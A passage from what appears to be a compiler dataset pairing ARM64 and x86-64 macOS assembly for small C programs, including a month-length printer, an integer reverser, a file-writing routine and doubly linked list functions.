bl ___stack_chk_fail
LBB0_6:
mov w0, #0
ldp x29, x30, [sp, #80] ; 16-byte Folded Reload
add sp, sp, #96
ret
.cfi_endproc
; -- End function
.section __TEXT,__const
.p2align 2 ; @__const.main.days
l___const.main.days:
.long 31 ; 0x1f
.long 28 ; 0x1c
.long 31 ; 0x1f
.long 30 ; 0x1e
.long 31 ; 0x1f
.long 30 ; 0x1e
.long 31 ; 0x1f
.long 31 ; 0x1f
.long 30 ; 0x1e
.long 31 ; 0x1f
.long 30 ; 0x1e
.long 31 ; 0x1f
.section __TEXT,__cstring,cstring_literals
l_.str: ; @.str
.asciz "Month %2d has %d days.\n"
.subsections_via_symbols
| .section __TEXT,__text,regular,pure_instructions
.build_version macos, 13, 0 sdk_version 13, 3
.globl _main ## -- Begin function main
.p2align 4, 0x90
_main: ## @main
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
subq $80, %rsp
movq ___stack_chk_guard@GOTPCREL(%rip), %rax
movq (%rax), %rax
movq %rax, -8(%rbp)
movl $0, -68(%rbp)
leaq -64(%rbp), %rdi
leaq l___const.main.days(%rip), %rsi
movl $48, %edx
callq _memcpy
movl $0, -72(%rbp)
LBB0_1: ## =>This Inner Loop Header: Depth=1
cmpl $12, -72(%rbp)
jge LBB0_4
## %bb.2: ## in Loop: Header=BB0_1 Depth=1
movl -72(%rbp), %esi
addl $1, %esi
movslq -72(%rbp), %rax
movl -64(%rbp,%rax,4), %edx
leaq L_.str(%rip), %rdi
movb $0, %al
callq _printf
## %bb.3: ## in Loop: Header=BB0_1 Depth=1
movl -72(%rbp), %eax
addl $1, %eax
movl %eax, -72(%rbp)
jmp LBB0_1
LBB0_4:
movq ___stack_chk_guard@GOTPCREL(%rip), %rax
movq (%rax), %rax
movq -8(%rbp), %rcx
cmpq %rcx, %rax
jne LBB0_6
## %bb.5:
xorl %eax, %eax
addq $80, %rsp
popq %rbp
retq
LBB0_6:
callq ___stack_chk_fail
ud2
.cfi_endproc
## -- End function
.section __TEXT,__const
.p2align 4 ## @__const.main.days
l___const.main.days:
.long 31 ## 0x1f
.long 28 ## 0x1c
.long 31 ## 0x1f
.long 30 ## 0x1e
.long 31 ## 0x1f
.long 30 ## 0x1e
.long 31 ## 0x1f
.long 31 ## 0x1f
.long 30 ## 0x1e
.long 31 ## 0x1f
.long 30 ## 0x1e
.long 31 ## 0x1f
.section __TEXT,__cstring,cstring_literals
L_.str: ## @.str
.asciz "Month %2d has %d days.\n"
.subsections_via_symbols
| the_stack_data/98576434.c |
.section __TEXT,__text,regular,pure_instructions
.build_version macos, 13, 0 sdk_version 13, 3
.globl _func ; -- Begin function func
.p2align 2
_func: ; @func
.cfi_startproc
; %bb.0:
stp x28, x27, [sp, #-32]! ; 16-byte Folded Spill
.cfi_def_cfa_offset 32
stp x29, x30, [sp, #16] ; 16-byte Folded Spill
add x29, sp, #16
.cfi_def_cfa w29, 16
.cfi_offset w30, -8
.cfi_offset w29, -16
.cfi_offset w27, -24
.cfi_offset w28, -32
sub sp, sp, #480
adrp x8, ___stack_chk_guard@GOTPAGE
ldr x8, [x8, ___stack_chk_guard@GOTPAGEOFF]
ldr x8, [x8]
stur x8, [x29, #-24]
mov x0, #4
bl _malloc
str x0, [sp, #64]
ldr x8, [sp, #64]
str x8, [sp, #72]
ldr x8, [sp, #72]
str x8, [sp, #56]
ldr w8, [sp, #72]
str w8, [sp, #52]
ldr w8, [sp, #72]
str w8, [sp, #48]
ldur q0, [sp, #72]
str q0, [sp, #16]
ldur q0, [sp, #88]
str q0, [sp, #32]
ldr s0, [sp, #16]
str s0, [sp, #12]
ldur x9, [x29, #-24]
adrp x8, ___stack_chk_guard@GOTPAGE
ldr x8, [x8, ___stack_chk_guard@GOTPAGEOFF]
ldr x8, [x8]
subs x8, x8, x9
cset w8, eq
tbnz w8, #0, LBB0_2
b LBB0_1
LBB0_1:
bl ___stack_chk_fail
LBB0_2:
add sp, sp, #480
ldp x29, x30, [sp, #16] ; 16-byte Folded Reload
ldp x28, x27, [sp], #32 ; 16-byte Folded Reload
ret
.cfi_endproc
; -- End function
.subsections_via_symbols
| .section __TEXT,__text,regular,pure_instructions
.build_version macos, 13, 0 sdk_version 13, 3
.globl _func ## -- Begin function func
.p2align 4, 0x90
_func: ## @func
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
subq $480, %rsp ## imm = 0x1E0
movq ___stack_chk_guard@GOTPCREL(%rip), %rax
movq (%rax), %rax
movq %rax, -8(%rbp)
movl $4, %edi
callq _malloc
movq %rax, -416(%rbp)
movq -416(%rbp), %rax
movq %rax, -408(%rbp)
movq -408(%rbp), %rax
movq %rax, -424(%rbp)
movl -408(%rbp), %eax
movl %eax, -428(%rbp)
movl -408(%rbp), %eax
movl %eax, -432(%rbp)
movq -408(%rbp), %rax
movq %rax, -464(%rbp)
movq -400(%rbp), %rax
movq %rax, -456(%rbp)
movq -392(%rbp), %rax
movq %rax, -448(%rbp)
movq -384(%rbp), %rax
movq %rax, -440(%rbp)
movss -464(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
movss %xmm0, -468(%rbp)
movq ___stack_chk_guard@GOTPCREL(%rip), %rax
movq (%rax), %rax
movq -8(%rbp), %rcx
cmpq %rcx, %rax
jne LBB0_2
## %bb.1:
addq $480, %rsp ## imm = 0x1E0
popq %rbp
retq
LBB0_2:
callq ___stack_chk_fail
ud2
.cfi_endproc
## -- End function
.subsections_via_symbols
| the_stack_data/6386777.c |
.section __TEXT,__text,regular,pure_instructions
.build_version macos, 13, 0 sdk_version 13, 3
.subsections_via_symbols
| .section __TEXT,__text,regular,pure_instructions
.build_version macos, 13, 0 sdk_version 13, 3
.subsections_via_symbols
| the_stack_data/34512619.c |
.section __TEXT,__text,regular,pure_instructions
.build_version macos, 13, 0 sdk_version 13, 3
.globl _my_fputs ; -- Begin function my_fputs
.p2align 2
_my_fputs: ; @my_fputs
.cfi_startproc
; %bb.0:
sub sp, sp, #48
.cfi_def_cfa_offset 48
stp x29, x30, [sp, #32] ; 16-byte Folded Spill
add x29, sp, #32
.cfi_def_cfa w29, 16
.cfi_offset w30, -8
.cfi_offset w29, -16
str x0, [sp, #16]
str x1, [sp, #8]
b LBB0_1
LBB0_1: ; =>This Inner Loop Header: Depth=1
ldr x8, [sp, #16]
ldrsb w8, [x8]
subs w8, w8, #0
cset w8, eq
tbnz w8, #0, LBB0_5
b LBB0_2
LBB0_2: ; in Loop: Header=BB0_1 Depth=1
ldr x8, [sp, #16]
add x9, x8, #1
str x9, [sp, #16]
ldrsb w0, [x8]
ldr x1, [sp, #8]
bl _fputc
adds w8, w0, #1
cset w8, ne
tbnz w8, #0, LBB0_4
b LBB0_3
LBB0_3:
mov w8, #-1
stur w8, [x29, #-4]
b LBB0_6
LBB0_4: ; in Loop: Header=BB0_1 Depth=1
b LBB0_1
LBB0_5:
stur wzr, [x29, #-4]
b LBB0_6
LBB0_6:
ldur w0, [x29, #-4]
ldp x29, x30, [sp, #32] ; 16-byte Folded Reload
add sp, sp, #48
ret
.cfi_endproc
; -- End function
.globl _main ; -- Begin function main
.p2align 2
_main: ; @main
.cfi_startproc
; %bb.0:
sub sp, sp, #48
.cfi_def_cfa_offset 48
stp x29, x30, [sp, #32] ; 16-byte Folded Spill
add x29, sp, #32
.cfi_def_cfa w29, 16
.cfi_offset w30, -8
.cfi_offset w29, -16
stur wzr, [x29, #-4]
adrp x8, l_.str@PAGE
add x8, x8, l_.str@PAGEOFF
str x8, [sp, #8]
adrp x0, l_.str.1@PAGE
add x0, x0, l_.str.1@PAGEOFF
adrp x1, l_.str.2@PAGE
add x1, x1, l_.str.2@PAGEOFF
bl _fopen
str x0, [sp, #16]
ldr x8, [sp, #16]
subs x8, x8, #0
cset w8, ne
tbnz w8, #0, LBB1_2
b LBB1_1
LBB1_1:
adrp x0, l_.str.3@PAGE
add x0, x0, l_.str.3@PAGEOFF
bl _printf
mov w0, #1
bl _exit
LBB1_2:
ldr x0, [sp, #8]
ldr x1, [sp, #16]
bl _my_fputs
mov x9, sp
; implicit-def: $x8
mov x8, x0
str x8, [x9]
adrp x0, l_.str.4@PAGE
add x0, x0, l_.str.4@PAGEOFF
bl _printf
ldr x0, [sp, #16]
bl _fclose
mov w0, #0
ldp x29, x30, [sp, #32] ; 16-byte Folded Reload
add sp, sp, #48
ret
.cfi_endproc
; -- End function
.section __TEXT,__cstring,cstring_literals
l_.str: ; @.str
.asciz "my string"
l_.str.1: ; @.str.1
.asciz "output.txt"
l_.str.2: ; @.str.2
.asciz "wb"
l_.str.3: ; @.str.3
.asciz "Cannot open output file\n"
l_.str.4: ; @.str.4
.asciz "status: %d\n"
.subsections_via_symbols
| .section __TEXT,__text,regular,pure_instructions
.build_version macos, 13, 0 sdk_version 13, 3
.globl _my_fputs ## -- Begin function my_fputs
.p2align 4, 0x90
_my_fputs: ## @my_fputs
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
subq $32, %rsp
movq %rdi, -16(%rbp)
movq %rsi, -24(%rbp)
LBB0_1: ## =>This Inner Loop Header: Depth=1
movq -16(%rbp), %rax
movsbl (%rax), %eax
cmpl $0, %eax
je LBB0_5
## %bb.2: ## in Loop: Header=BB0_1 Depth=1
movq -16(%rbp), %rax
movq %rax, %rcx
addq $1, %rcx
movq %rcx, -16(%rbp)
movsbl (%rax), %edi
movq -24(%rbp), %rsi
callq _fputc
cmpl $-1, %eax
jne LBB0_4
## %bb.3:
movl $-1, -4(%rbp)
jmp LBB0_6
LBB0_4: ## in Loop: Header=BB0_1 Depth=1
jmp LBB0_1
LBB0_5:
movl $0, -4(%rbp)
LBB0_6:
movl -4(%rbp), %eax
addq $32, %rsp
popq %rbp
retq
.cfi_endproc
## -- End function
.globl _main ## -- Begin function main
.p2align 4, 0x90
_main: ## @main
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
subq $32, %rsp
movl $0, -4(%rbp)
leaq L_.str(%rip), %rax
movq %rax, -24(%rbp)
leaq L_.str.1(%rip), %rdi
leaq L_.str.2(%rip), %rsi
callq _fopen
movq %rax, -16(%rbp)
cmpq $0, -16(%rbp)
jne LBB1_2
## %bb.1:
leaq L_.str.3(%rip), %rdi
xorl %eax, %eax
## kill: def $al killed $al killed $eax
callq _printf
movl $1, %edi
callq _exit
LBB1_2:
movq -24(%rbp), %rdi
movq -16(%rbp), %rsi
callq _my_fputs
movl %eax, %esi
leaq L_.str.4(%rip), %rdi
movb $0, %al
callq _printf
movq -16(%rbp), %rdi
callq _fclose
xorl %eax, %eax
addq $32, %rsp
popq %rbp
retq
.cfi_endproc
## -- End function
.section __TEXT,__cstring,cstring_literals
L_.str: ## @.str
.asciz "my string"
L_.str.1: ## @.str.1
.asciz "output.txt"
L_.str.2: ## @.str.2
.asciz "wb"
L_.str.3: ## @.str.3
.asciz "Cannot open output file\n"
L_.str.4: ## @.str.4
.asciz "status: %d\n"
.subsections_via_symbols
| the_stack_data/45327.c |
.section __TEXT,__text,regular,pure_instructions
.build_version macos, 13, 0 sdk_version 13, 3
.globl _main ; -- Begin function main
.p2align 2
_main: ; @main
.cfi_startproc
; %bb.0:
sub sp, sp, #64
.cfi_def_cfa_offset 64
stp x29, x30, [sp, #48] ; 16-byte Folded Spill
add x29, sp, #48
.cfi_def_cfa w29, 16
.cfi_offset w30, -8
.cfi_offset w29, -16
stur wzr, [x29, #-4]
stur wzr, [x29, #-16]
mov x9, sp
sub x8, x29, #8
str x8, [x9]
adrp x0, l_.str@PAGE
add x0, x0, l_.str@PAGEOFF
bl _scanf
ldur w8, [x29, #-8]
stur w8, [x29, #-20]
b LBB0_1
LBB0_1: ; =>This Inner Loop Header: Depth=1
ldur w8, [x29, #-8]
subs w8, w8, #0
cset w8, eq
tbnz w8, #0, LBB0_3
b LBB0_2
LBB0_2: ; in Loop: Header=BB0_1 Depth=1
ldur w8, [x29, #-8]
mov w9, #10
sdiv w10, w8, w9
mul w10, w10, w9
subs w8, w8, w10
stur w8, [x29, #-12]
ldur w8, [x29, #-16]
mul w8, w8, w9
ldur w10, [x29, #-12]
add w8, w8, w10
stur w8, [x29, #-16]
ldur w8, [x29, #-8]
sdiv w8, w8, w9
stur w8, [x29, #-8]
b LBB0_1
LBB0_3:
ldur w8, [x29, #-20]
; implicit-def: $x10
mov x10, x8
ldur w9, [x29, #-16]
; implicit-def: $x8
mov x8, x9
mov x9, sp
str x10, [x9]
str x8, [x9, #8]
adrp x0, l_.str.1@PAGE
add x0, x0, l_.str.1@PAGEOFF
bl _printf
mov w0, #0
ldp x29, x30, [sp, #48] ; 16-byte Folded Reload
add sp, sp, #64
ret
.cfi_endproc
; -- End function
.section __TEXT,__cstring,cstring_literals
l_.str: ; @.str
.asciz "%d"
l_.str.1: ; @.str.1
.asciz "Reverse of %d is %d"
.subsections_via_symbols
| .section __TEXT,__text,regular,pure_instructions
.build_version macos, 13, 0 sdk_version 13, 3
.globl _main ## -- Begin function main
.p2align 4, 0x90
_main: ## @main
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
subq $32, %rsp
movl $0, -4(%rbp)
movl $0, -16(%rbp)
leaq L_.str(%rip), %rdi
leaq -8(%rbp), %rsi
movb $0, %al
callq _scanf
movl -8(%rbp), %eax
movl %eax, -20(%rbp)
LBB0_1: ## =>This Inner Loop Header: Depth=1
cmpl $0, -8(%rbp)
je LBB0_3
## %bb.2: ## in Loop: Header=BB0_1 Depth=1
movl -8(%rbp), %eax
movl $10, %ecx
cltd
idivl %ecx
movl %edx, -12(%rbp)
imull $10, -16(%rbp), %eax
addl -12(%rbp), %eax
movl %eax, -16(%rbp)
movl -8(%rbp), %eax
movl $10, %ecx
cltd
idivl %ecx
movl %eax, -8(%rbp)
jmp LBB0_1
LBB0_3:
movl -20(%rbp), %esi
movl -16(%rbp), %edx
leaq L_.str.1(%rip), %rdi
movb $0, %al
callq _printf
xorl %eax, %eax
addq $32, %rsp
popq %rbp
retq
.cfi_endproc
## -- End function
.section __TEXT,__cstring,cstring_literals
L_.str: ## @.str
.asciz "%d"
L_.str.1: ## @.str.1
.asciz "Reverse of %d is %d"
.subsections_via_symbols
| the_stack_data/92327590.c |
.section __TEXT,__text,regular,pure_instructions
.build_version macos, 13, 0 sdk_version 13, 3
.globl _list_contains ; -- Begin function list_contains
.p2align 2
_list_contains: ; @list_contains
.cfi_startproc
; %bb.0:
sub sp, sp, #32
.cfi_def_cfa_offset 32
str x0, [sp, #16]
str w1, [sp, #12]
ldr x8, [sp, #16]
str x8, [sp]
b LBB0_1
LBB0_1: ; =>This Inner Loop Header: Depth=1
ldr x8, [sp]
subs x8, x8, #0
cset w8, eq
tbnz w8, #0, LBB0_5
b LBB0_2
LBB0_2: ; in Loop: Header=BB0_1 Depth=1
ldr x8, [sp]
ldr w8, [x8]
ldr w9, [sp, #12]
subs w8, w8, w9
cset w8, ne
tbnz w8, #0, LBB0_4
b LBB0_3
LBB0_3:
mov w8, #1
and w8, w8, #0x1
and w8, w8, #0x1
strb w8, [sp, #31]
b LBB0_6
LBB0_4: ; in Loop: Header=BB0_1 Depth=1
ldr x8, [sp]
ldr x8, [x8, #16]
str x8, [sp]
b LBB0_1
LBB0_5:
mov w8, #0
and w8, w8, #0x1
and w8, w8, #0x1
strb w8, [sp, #31]
b LBB0_6
LBB0_6:
ldrb w8, [sp, #31]
and w0, w8, #0x1
add sp, sp, #32
ret
.cfi_endproc
; -- End function
.globl _list_count ; -- Begin function list_count
.p2align 2
_list_count: ; @list_count
.cfi_startproc
; %bb.0:
sub sp, sp, #32
.cfi_def_cfa_offset 32
str x0, [sp, #24]
ldr x8, [sp, #24]
str x8, [sp, #16]
str wzr, [sp, #12]
b LBB1_1
LBB1_1: ; =>This Inner Loop Header: Depth=1
ldr x8, [sp, #16]
subs x8, x8, #0
cset w8, eq
tbnz w8, #0, LBB1_3
b LBB1_2
LBB1_2: ; in Loop: Header=BB1_1 Depth=1
ldr w8, [sp, #12]
add w8, w8, #1
str w8, [sp, #12]
ldr x8, [sp, #16]
ldr x8, [x8, #16]
str x8, [sp, #16]
b LBB1_1
LBB1_3:
ldr w0, [sp, #12]
add sp, sp, #32
ret
.cfi_endproc
; -- End function
.globl _list_create ; -- Begin function list_create
.p2align 2
_list_create: ; @list_create
.cfi_startproc
; %bb.0:
sub sp, sp, #32
.cfi_def_cfa_offset 32
stp x29, x30, [sp, #16] ; 16-byte Folded Spill
add x29, sp, #16
.cfi_def_cfa w29, 16
.cfi_offset w30, -8
.cfi_offset w29, -16
stur w0, [x29, #-4]
mov x0, #24
bl _malloc
str x0, [sp]
ldur w8, [x29, #-4]
ldr x9, [sp]
str w8, [x9]
ldr x8, [sp]
; kill: def $x9 killed $xzr
str xzr, [x8, #8]
ldr x8, [sp]
str xzr, [x8, #16]
ldr x0, [sp]
ldp x29, x30, [sp, #16] ; 16-byte Folded Reload
add sp, sp, #32
ret
.cfi_endproc
; -- End function
.globl _list_get_first ; -- Begin function list_get_first
.p2align 2
_list_get_first: ; @list_get_first
.cfi_startproc
; %bb.0:
sub sp, sp, #16
.cfi_def_cfa_offset 16
str x0, [sp, #8]
ldr x8, [sp, #8]
str x8, [sp]
b LBB3_1
LBB3_1: ; =>This Inner Loop Header: Depth=1
ldr x8, [sp]
subs x8, x8, #0
cset w8, eq
tbnz w8, #0, LBB3_3
b LBB3_2
LBB3_2: ; in Loop: Header=BB3_1 Depth=1
ldr x8, [sp]
ldr x8, [x8, #8]
str x8, [sp]
b LBB3_1
LBB3_3:
ldr x0, [sp]
add sp, sp, #16
ret
.cfi_endproc
; -- End function
.globl _list_get_last ; -- Begin function list_get_last
.p2align 2
_list_get_last: ; @list_get_last
.cfi_startproc
; %bb.0:
sub sp, sp, #16
.cfi_def_cfa_offset 16
str x0, [sp, #8]
ldr x8, [sp, #8]
str x8, [sp]
b LBB4_1
LBB4_1: ; =>This Inner Loop Header: Depth=1
ldr x8, [sp]
ldr x8, [x8, #16]
subs x8, x8, #0
cset w8, eq
tbnz w8, #0, LBB4_3
b LBB4_2
LBB4_2: ; in Loop: Header=BB4_1 Depth=1
ldr x8, [sp]
ldr x8, [x8, #16]
str x8, [sp]
b LBB4_1
LBB4_3:
ldr x0, [sp]
add sp, sp, #16
ret
.cfi_endproc
; -- End function
.globl _list_get_index ; -- Begin function list_get_index
.p2align 2
_list_get_index: ; @list_get_index
.cfi_startproc
; %bb.0:
sub sp, sp, #48
.cfi_def_cfa_offset 48
str x0, [sp, #32]
str w1, [sp, #28]
ldr x8, [sp, #32]
str x8, [sp, #16]
str wzr, [sp, #12]
b LBB5_1
LBB5_1: ; =>This Inner Loop Header: Depth=1
ldr x8, [sp, #16]
subs x8, x8, #0
cset w8, eq
tbnz w8, #0, LBB5_5
b LBB5_2
LBB5_2: ; in Loop: Header=BB5_1 Depth=1
ldr w8, [sp, #12]
ldr w9, [sp, #28]
subs w8, w8, w9
cset w8, ne
tbnz w8, #0, LBB5_4
b LBB5_3
LBB5_3:
b LBB5_5
LBB5_4: ; in Loop: Header=BB5_1 Depth=1
ldr w8, [sp, #12]
add w8, w8, #1
str w8, [sp, #12]
ldr x8, [sp, #16]
ldr x8, [x8, #16]
str x8, [sp, #16]
b LBB5_1
LBB5_5:
ldr w8, [sp, #12]
ldr w9, [sp, #28]
subs w8, w8, w9
cset w8, eq
tbnz w8, #0, LBB5_7
b LBB5_6
LBB5_6:
; kill: def $x8 killed $xzr
str xzr, [sp, #40]
b LBB5_8
LBB5_7:
ldr x8, [sp, #16]
str x8, [sp, #40]
b LBB5_8
LBB5_8:
ldr x0, [sp, #40]
add sp, sp, #48
ret
.cfi_endproc
; -- End function
.globl _list_add ; -- Begin function list_add
.p2align 2
_list_add: ; @list_add
.cfi_startproc
; %bb.0:
sub sp, sp, #48
.cfi_def_cfa_offset 48
stp x29, x30, [sp, #32] ; 16-byte Folded Spill
add x29, sp, #32
.cfi_def_cfa w29, 16
.cfi_offset w30, -8
.cfi_offset w29, -16
stur x0, [x29, #-8]
stur w1, [x29, #-12]
mov x0, #24
bl _malloc
str x0, [sp, #8]
ldur x0, [x29, #-8]
bl _list_get_last
str x0, [sp]
ldur w8, [x29, #-12]
ldr x9, [sp, #8]
str w8, [x9]
ldr x8, [sp]
ldr x9, [sp, #8]
str x8, [x9, #8]
ldr x8, [sp, #8]
; kill: def $x9 killed $xzr
str xzr, [x8, #16]
ldr x8, [sp, #8]
ldr x9, [sp]
str x8, [x9, #16]
ldur x0, [x29, #-8]
ldp x29, x30, [sp, #32] ; 16-byte Folded Reload
add sp, sp, #48
ret
.cfi_endproc
; -- End function
.globl _list_remove_index ; -- Begin function list_remove_index
.p2align 2
_list_remove_index: ; @list_remove_index
.cfi_startproc
; %bb.0:
sub sp, sp, #64
.cfi_def_cfa_offset 64
stp x29, x30, [sp, #48] ; 16-byte Folded Spill
add x29, sp, #48
.cfi_def_cfa w29, 16
.cfi_offset w30, -8
.cfi_offset w29, -16
stur x0, [x29, #-16]
stur w1, [x29, #-20]
ldur x0, [x29, #-16]
ldur w1, [x29, #-20]
bl _list_get_index
str x0, [sp, #16]
ldr x8, [sp, #16]
subs x8, x8, #0
cset w8, ne
tbnz w8, #0, LBB7_2
b LBB7_1
LBB7_1:
ldur x8, [x29, #-16]
stur x8, [x29, #-8]
b LBB7_9
LBB7_2:
ldr x8, [sp, #16]
ldr x8, [x8, #8]
subs x8, x8, #0
cset w8, eq
tbnz w8, #0, LBB7_6
b LBB7_3
LBB7_3:
ldr x8, [sp, #16]
ldr x8, [x8, #16]
ldr x9, [sp, #16]
ldr x9, [x9, #8]
str x8, [x9, #16]
ldr x8, [sp, #16]
ldr x8, [x8, #16]
subs x8, x8, #0
cset w8, eq
tbnz w8, #0, LBB7_5
b LBB7_4
LBB7_4:
ldr x8, [sp, #16]
ldr x8, [x8, #8]
ldr x9, [sp, #16]
ldr x9, [x9, #16]
str x8, [x9, #8]
b LBB7_5
LBB7_5:
ldr x8, [sp, #16]
ldr x8, [x8, #8]
str x8, [sp, #8]
ldr x0, [sp, #16]
bl _free
ldr x8, [sp, #8]
stur x8, [x29, #-8]
b LBB7_9
LBB7_6:
ldr x8, [sp, #16]
ldr x8, [x8, #16]
subs x8, x8, #0
cset w8, eq
tbnz w8, #0, LBB7_8
b LBB7_7
LBB7_7:
ldr x8, [sp, #16]
ldr x8, [x8, #16]
; kill: def $x9 killed $xzr
str xzr, [x8, #8]
ldr x8, [sp, #16]
ldr x8, [x8, #16]
str x8, [sp]
ldr x0, [sp, #16]
bl _free
ldr x8, [sp]
stur x8, [x29, #-8]
b LBB7_9
LBB7_8:
; kill: def $x8 killed $xzr
stur xzr, [x29, #-8]
b LBB7_9
LBB7_9:
ldur x0, [x29, #-8]
ldp x29, x30, [sp, #48] ; 16-byte Folded Reload
add sp, sp, #64
ret
.cfi_endproc
; -- End function
.globl _list_remove_values ; -- Begin function list_remove_values
.p2align 2
_list_remove_values: ; @list_remove_values
.cfi_startproc
; %bb.0:
sub sp, sp, #48
.cfi_def_cfa_offset 48
stp x29, x30, [sp, #32] ; 16-byte Folded Spill
add x29, sp, #32
.cfi_def_cfa w29, 16
.cfi_offset w30, -8
.cfi_offset w29, -16
stur x0, [x29, #-8]
stur w1, [x29, #-12]
ldur x8, [x29, #-8]
str x8, [sp, #8]
b LBB8_1
LBB8_1: ; =>This Inner Loop Header: Depth=1
ldr x8, [sp, #8]
subs x8, x8, #0
cset w8, eq
tbnz w8, #0, LBB8_11
b LBB8_2
LBB8_2: ; in Loop: Header=BB8_1 Depth=1
ldr x8, [sp, #8]
ldr x8, [x8, #16]
str x8, [sp]
ldr x8, [sp, #8]
ldr w8, [x8]
ldur w9, [x29, #-12]
subs w8, w8, w9
cset w8, ne
tbnz w8, #0, LBB8_10
b LBB8_3
LBB8_3: ; in Loop: Header=BB8_1 Depth=1
ldr x8, [sp, #8]
ldr x8, [x8, #8]
subs x8, x8, #0
cset w8, eq
tbnz w8, #0, LBB8_5
b LBB8_4
LBB8_4: ; in Loop: Header=BB8_1 Depth=1
ldr x8, [sp, #8]
ldr x8, [x8, #16]
ldr x9, [sp, #8]
ldr x9, [x9, #8]
str x8, [x9, #16]
b LBB8_5
LBB8_5: ; in Loop: Header=BB8_1 Depth=1
ldr x8, [sp, #8]
ldr x8, [x8, #16]
subs x8, x8, #0
cset w8, eq
tbnz w8, #0, LBB8_7
b LBB8_6
LBB8_6: ; in Loop: Header=BB8_1 Depth=1
ldr x8, [sp, #8]
ldr x8, [x8, #8]
ldr x9, [sp, #8]
ldr x9, [x9, #16]
str x8, [x9, #8]
b LBB8_7
LBB8_7: ; in Loop: Header=BB8_1 Depth=1
ldr x8, [sp, #8]
ldur x9, [x29, #-8]
subs x8, x8, x9
cset w8, ne
tbnz w8, #0, LBB8_9
b LBB8_8
LBB8_8: ; in Loop: Header=BB8_1 Depth=1
ldr x8, [sp, #8]
ldr x8, [x8, #16]
stur x8, [x29, #-8]
b LBB8_9
LBB8_9: ; in Loop: Header=BB8_1 Depth=1
ldr x0, [sp, #8]
bl _free
b LBB8_10
LBB8_10: ; in Loop: Header=BB8_1 Depth=1
ldr x8, [sp]
str x8, [sp, #8]
b LBB8_1
LBB8_11:
ldur x0, [x29, #-8]
ldp x29, x30, [sp, #32] ; 16-byte Folded Reload
add sp, sp, #48
ret
.cfi_endproc
; -- End function
.subsections_via_symbols
| .section __TEXT,__text,regular,pure_instructions
.build_version macos, 13, 0 sdk_version 13, 3
.globl _list_contains ## -- Begin function list_contains
.p2align 4, 0x90
_list_contains: ## @list_contains
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
movq %rdi, -16(%rbp)
movl %esi, -20(%rbp)
movq -16(%rbp), %rax
movq %rax, -32(%rbp)
LBB0_1: ## =>This Inner Loop Header: Depth=1
cmpq $0, -32(%rbp)
je LBB0_5
## %bb.2: ## in Loop: Header=BB0_1 Depth=1
movq -32(%rbp), %rax
movl (%rax), %eax
cmpl -20(%rbp), %eax
jne LBB0_4
## %bb.3:
movb $1, -1(%rbp)
jmp LBB0_6
LBB0_4: ## in Loop: Header=BB0_1 Depth=1
movq -32(%rbp), %rax
movq 16(%rax), %rax
movq %rax, -32(%rbp)
jmp LBB0_1
LBB0_5:
movb $0, -1(%rbp)
LBB0_6:
movb -1(%rbp), %al
andb $1, %al
movzbl %al, %eax
popq %rbp
retq
.cfi_endproc
## -- End function
.globl _list_count ## -- Begin function list_count
.p2align 4, 0x90
_list_count: ## @list_count
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
movq %rdi, -8(%rbp)
movq -8(%rbp), %rax
movq %rax, -16(%rbp)
movl $0, -20(%rbp)
LBB1_1: ## =>This Inner Loop Header: Depth=1
cmpq $0, -16(%rbp)
je LBB1_3
## %bb.2: ## in Loop: Header=BB1_1 Depth=1
movl -20(%rbp), %eax
addl $1, %eax
movl %eax, -20(%rbp)
movq -16(%rbp), %rax
movq 16(%rax), %rax
movq %rax, -16(%rbp)
jmp LBB1_1
LBB1_3:
movl -20(%rbp), %eax
popq %rbp
retq
.cfi_endproc
## -- End function
.globl _list_create ## -- Begin function list_create
.p2align 4, 0x90
_list_create: ## @list_create
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
subq $16, %rsp
movl %edi, -4(%rbp)
movl $24, %edi
callq _malloc
movq %rax, -16(%rbp)
movl -4(%rbp), %ecx
movq -16(%rbp), %rax
movl %ecx, (%rax)
movq -16(%rbp), %rax
movq $0, 8(%rax)
movq -16(%rbp), %rax
movq $0, 16(%rax)
movq -16(%rbp), %rax
addq $16, %rsp
popq %rbp
retq
.cfi_endproc
## -- End function
.globl _list_get_first ## -- Begin function list_get_first
.p2align 4, 0x90
_list_get_first: ## @list_get_first
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
movq %rdi, -8(%rbp)
movq -8(%rbp), %rax
movq %rax, -16(%rbp)
LBB3_1: ## =>This Inner Loop Header: Depth=1
cmpq $0, -16(%rbp)
je LBB3_3
## %bb.2: ## in Loop: Header=BB3_1 Depth=1
movq -16(%rbp), %rax
movq 8(%rax), %rax
movq %rax, -16(%rbp)
jmp LBB3_1
LBB3_3:
movq -16(%rbp), %rax
popq %rbp
retq
.cfi_endproc
## -- End function
.globl _list_get_last ## -- Begin function list_get_last
.p2align 4, 0x90
_list_get_last: ## @list_get_last
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
movq %rdi, -8(%rbp)
movq -8(%rbp), %rax
movq %rax, -16(%rbp)
LBB4_1: ## =>This Inner Loop Header: Depth=1
movq -16(%rbp), %rax
cmpq $0, 16(%rax)
je LBB4_3
